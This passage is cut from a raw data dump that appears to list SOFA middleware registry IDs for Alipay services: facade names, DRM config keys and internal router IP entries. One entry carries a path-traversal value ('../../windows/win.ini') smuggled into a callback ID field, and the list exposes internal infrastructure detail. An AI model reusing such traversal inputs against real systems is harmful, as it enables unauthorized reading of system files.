M","com.alipay.autoinsprod.common.insure.v2.AutoUserSignFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.mybank.bkqafactory.facade.FluxTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.88.50.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbtemplate.common.service.facade.manage.PageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mmemberprod.backend.service.facade.MerchantMemberTemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.cryptprod.common.service.facade.CipherKeyQueryFacade:1.0:@fccryptprod_service_unique_id@@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxian.ipp.service.facade.instask.InsTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:lifemock@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.kbticketcenter.KbtOperateRefundUsedTicketService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csguide.service.facade.api.PageSensitiveService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchprod_merchantBankCardProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaoprod.biz.mwallet.manager.shop.ShopManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.biz.batch.base.finalizetask.FinalizeTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.rabbit.common.service.facade.RabbitTopicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.defincustomer.facade.api.bankaccount.BankAccountService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandConditionStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.common.service.integration.drm.loadtest.LoadTestConfigDrm.recTriggerConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cap.common.service.tenant.CapTenantAliyunExtService:1.0:antcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CommonDonateItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.itransferprod.service.facade.api.UserReferenceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.fuseClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.merchant.common.service.facade.SwitchCoreQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.189.179#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundprotocol.common.service.facade.QualifiedInvestorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommons.common.spi.api.ArtisanComponentSpiFacade:1.0:bktoc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.ou.OuManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.caprod.service.ukey.facade.UkeyTradeInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemprod.biz.service.webspi.controller.KbItemPunishDescQueryWrapperService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.InsProductDrmClient.policyTypeFilterSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.46.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocommopt.com.service.facade.spi.DailyTaskDisplayInfoConsultService:1.0:fundapplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imif.common.service.facade.v2.MerchantUpdateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.malgo.common.facade.ExperimentConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuyan.file.AdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.InfoDisclosureFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxagg.common.service.facade.api.management.page.AggPageMngConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.custassetTBaseCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.merchant.SettleBankManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.ifcidentitycloud.common.service.facade.mic.zproxy.SecurityPolicyVerifyZpFacade:1.0:ifcidentitycloudus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.72.178#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.forexprod.common.service.facade.ForexRefundWQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quickrun.common.service.api.TaskRunningFacade:1.0:girisk@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.165#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.97.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antsecscheduler.common.service.facade.AliMailManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.serverless.test.facade.RpcTestService:1.0:arkbaseserverless-vipone-aigd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.item.facade.InventoryApplyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.facade.quota.AlarmTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:secudownload@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dayuarkbase.facade.CompentTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.tradeexprod.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.innertrans.facade.api.InnerAccountInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfbill.common.service.facade.api.BillAcceptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cschannel.common.service.facade.api.prod.mng.ServSpmPointMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mquery.common.service.facade.report.AccountSummaryFacde:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkebankcore_coopVerifyManageProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.schedule.TaskhubSofaScheduler:1.0:finTaskHubCallBacker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:meshyoptprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.baoxian.ipp.service.facade.IppMerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.drm.WhiteListSwitchDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoprod.common.service.facade.campaign.mng.CampaignManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_T_ABCDEFG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cif.facade.AntPassportMigrationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.AntqOffsetFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.128.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.comparacenter.common.service.facade.ComParaOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isdispatcher.facade.DispatchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.2.7#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.airbops:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.141.191#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.167.123.122#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.mashup:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestPreIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.frdecision.common.service.facade.api.EventLabelSchemaQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_createIsvInfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FilePlatformParseReceiver:1.0:poscore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_ALIFI_CEIF#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.uioservice.common.service.facade.api.CategoryRecProviderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.anteduprod.common.service.facade.api.school.SchoolMemberServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_169.254.234.201#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cloudbox.facade.apibus.service.sidecar.SidecarOperationUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finadvisorprod.common.service.facade.mng.TaskManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.afwrobottwa:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.LoanApplyDrmResource.checkLoanOrgCodeWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insagentprod.facade.developbusiness.InsLifeDevelopBusinessWorkFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSasControlDrmResource.unfreezeOverTimeRange,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.clientLoadTestStoreType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.acquirefront.service.facade.api.standard.AcquireStandardRefundService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cdp.common.service.facade.space.api.CdpSpaceSubobjectApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.loan.impl.support.drm.UcaMigrateOperateDrm.migrateActionIdList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dataphin.pipeline.common.facade.core.migrate.PipelineMigrateOpenService:1.0:dataphin-pipeline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.mellivora.ServiceRequestExecuteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.subject.SubjectManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.168.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_INSTOPERATION#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_BKFM_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:finsignargo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promocenter.common.manage.facade.api.template.SceneTemplateInstanceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.loanapi.support.LoanCmdSupportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.zprodqueryTairCacheCZone_dest.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openexprod.common.service.facade.SwitchCoreQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.213.245#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.mif.common.service.facade.mng.MccMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.prodquery.common.service.facade.standard.api.product.ProductQueryStdFacade:1.0:PDCORE_SSCMW1CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.riskservice.spi.OpsChngEventListener:1.0:airbops_paas_sub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.token.spi.SecurityPolicyVerifyFacade:1.0:securityexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.ucm.core.manager.FeedbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.igadaptor.biz.service.impl.TransactionInfoQuerySpiImpl:1.0:igadaptor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_O_KBSECURITY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openmq.common.service.facade.MessageCallbackService:1.0:certify@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.152.100#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.80.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fluxconf.service.facade.ctrl.DataClientFetchService:1.0:fluxconf@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.onestopmng.OstsPartnerProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.linku.common.service.facade.session.SessionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchcommerce.smdd.facade.isv.LSMDD4IsvTableStickerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.ProductNewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.pointmng.generalpointOracleDataSource.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finslip:name=com.alipay.finslip.biz.service.drm.DrmFinslipResource.fullBatchDaemonSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchcommerce.fmcgcore.common.service.facade.api.isv.IsvSpiManagerGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.analysis.InsIopSceneAnalysisMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodmng.facade.mcc.MccUpgradeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.admediamgr.common.service.facade.service.AdminIOTDeviceServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.bindingaccount.LifeBindingAccountQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_M_APP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alibaba.dataphin.dpmetaportal.common.facade.api.SubjectAPI:1.0:dataphin-dpmetaportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.snapshot.PublishSnapshotMigrateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.AgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.158.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitydata.common.service.variable.facade.strategyref.VariableReferrerQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finsteward.common.service.facade.service.UserComplexQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscvprod.common.service.facade.cicada.InsAdjustmentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@compmng#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.mobileic.common.service.facade.ctid.spi.CtidFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bksonarpro.common.service.facade.api.FundExperienceFacade:1.0:bksonarpro@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.anteye.data.PrivacySecurityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pointcore.common.mpoint.facade.MpointDrawbackService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcbmarketcenter:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:approvePdcAgreementProcessSyncTask@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.StationFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.mydds:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.echox.service.EchoxAopPlaybackService:1.0:imkteyecn@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@bizrecon#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.budgetcore.core.control.BudgetVmControlComponent:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache_dest.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.partnerFundCampSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfpcenter:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.77.241#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:zdw_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkwirelessdataportal.common.service.panda.SyncManagerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditint.facade.service.PcreditBillInstallmentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlbs.microservice.tagcore.facade.TagDataQueryFacade:1.0:MY@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.drm.SnapshotMsgPublishSwitchDrmResourceInterface:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.policy.ValidationSecurityPolicyService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.livekit.LiveKitSceneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bumng.common.service.facade.PermissionService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.custcenterprod.biz.service.mobilegw.AcquireGwFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.certify.service.facade.CertifyBankWithdrawFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.mydds.dassmetaDataSource.failOnPhysicalInit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promomng.core.service.promoworkbench.CouponConfigQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlaw.common.service.facade.api.TemplateBizTypeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.166.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.192.113#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.88.111.178#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinbaseprod.common.service.facade.api.AntSearchContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.ConstraintManager:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfsettleprod.facade.PaymentApplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sffcore.AppCreateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.166#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_10.15.236.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_192.168.1.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundprod.common.service.facade.scene.LoadTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:../../../../../../../../../../windows/win.ini@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:gzmshmp-hbmarket#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.promocenter:name=com.alipay.promocenter.common.drm.MerchantOperatorResource.redirectUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.history.QueryHistoryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.clerktone.facade.api.attendance.ClerkAttendanceManageGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.ProductOfferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cmsmng:name=com.alipay.sla.businessroute.drm.BusinessRoutePolicy.whiteListVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservice.common.service.facade.api.workflow.WorkflowPresKaConsultationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.archimedes.common.service.facade.api.DwFlushMessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.csbizcenter.facade.GrayRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.agds.facade.institution.ALiLoanCQPlatformCreditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.tag.TagItemConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.25.200#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbticketcenter.common.service.facade.api.TicketBizOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.176.142#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inscharity.common.service.facade.PolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.97.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.QueryTradeListPartnerTimeLimitResource.timeValue,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.BalanceFreezeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acorchestraweb.web.home.sofarest.ServiceParametersRestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.pointmng.generalpointOracleDataSource.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbprod.common.service.facade.appointment.service.AppointmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.indicator.drm.IndicatorTransmitResource.downUserIdTransType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.idpatrol.core.service.dashboard.DashboardNewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmepinfocenter.common.service.facade.api.util.kmi.KmiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insofflineinvest.common.service.facade.service.ReplyValidatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.bcriskevent.facade.api.RiskPropertyModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.161.135#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.custview.facade.ClassificationViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_OWEN_DEBUG#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.batchpay.common.service.facade.bptb.BatchPayApiDownloadService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.xts.bacs.spi.BusinessActivityStateResolver:1.0:chargefront@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.activity.facade.manage.ActivityManageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecSceneServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxtrade.common.service.facade.cp.LiquidityProviderManageFacade:1.